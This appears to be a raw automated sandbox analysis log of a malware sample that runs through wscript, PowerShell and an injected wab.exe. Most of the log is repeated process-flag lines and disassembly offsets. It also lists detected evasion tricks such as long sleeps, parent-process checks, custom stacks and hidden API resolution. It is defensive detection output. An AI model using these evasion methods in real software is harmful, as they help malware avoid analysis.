Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFAACD85479 push ebp; iretd 2_2_00007FFAACD85538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0300EC78 pushfd ; retf 14_2_0300EC79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_07751FB2 push eax; mov dword ptr [esp], ecx 14_2_077521B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0923F155 push eax; iretd 14_2_0923F15E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_09235D96 push edx; ret 14_2_09235D9D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0923B9E0 push edx; ret 14_2_0923B9E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_09240862 push ebp; ret 14_2_09240834
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_09240709 push 8FC93C6Fh; iretd 14_2_0924070E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0923AF63 push cs; retf 14_2_0923AFD6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0923C3A7 pushad ; iretd 14_2_0923C3B2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0923AFB5 push ss; retf 14_2_0923AFC2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0923039E push eax; iretd 14_2_0923039F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_092407E2 push ebp; ret 14_2_09240834
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0923AFC4 push cs; retf 14_2_0923AFD6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0923E2DC push ds; iretd 14_2_0923E2DD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_24572806 push ecx; ret 17_2_24572819
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_24581219 push esp; iretd 17_2_2458121A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_044F0862 push ebp; ret 17_2_044F0834
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_044EF155 push eax; iretd 17_2_044EF15E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_044EB9E0 push edx; ret 17_2_044EB9E8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_044E5D96 push edx; ret 17_2_044E5D9D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_044EE2DC push ds; iretd 17_2_044EE2DD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_044EAF63 push cs; retf 17_2_044EAFD6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_044F0709 push 8FC93C6Fh; iretd 17_2_044F070E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_044EAFC4 push cs; retf 17_2_044EAFD6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_044F07E2 push ebp; ret 17_2_044F0834
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_044E039E push eax; iretd 17_2_044E039F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_044EC3A7 pushad ; iretd 17_2_044EC3B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_044EAFB5 push ss; retf 17_2_044EAFC2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0044693D push ecx; ret 20_2_0044694D
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 23_2_004047CB
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 70BDF8D
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 20_2_0040DD85
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6162 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3647 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7554 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1989 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 431 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 9064 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: foregroundWindowGot 1768 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 9.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 6624 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6532 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416 Thread sleep count: 7554 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420 Thread sleep count: 1989 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7888 Thread sleep count: 229 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7888 Thread sleep time: -114500s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7892 Thread sleep count: 431 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7892 Thread sleep time: -1293000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7892 Thread sleep count: 9064 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7892 Thread sleep time: -27192000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_245710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 17_2_245710F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_24576580 FindFirstFileExA, 17_2_24576580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0040AE51 FindFirstFileW,FindNextFileW, 20_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 23_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 24_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00418981 memset,GetSystemInfo, 20_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
